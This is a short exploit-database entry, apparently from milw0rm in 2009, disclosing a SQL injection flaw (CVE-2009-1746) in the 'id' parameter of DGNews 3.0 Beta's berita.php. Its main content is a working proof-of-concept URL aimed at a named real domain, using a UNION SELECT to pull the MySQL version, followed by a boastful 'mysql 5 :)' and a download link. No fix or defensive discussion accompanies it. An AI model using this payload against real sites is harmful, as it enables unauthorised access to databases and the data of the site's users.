DGNews 3.0 Beta - 'id' SQL Injection

EKU-ID: 16533	CVE: OSVDB-54658;CVE-2009-1746	OSVDB-ID:
Author: Cyber-Zone	Published: 2009-05-18	Verified:
Download:

Rating

☆☆☆☆☆

********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************

http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

mysql 5 :)

Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]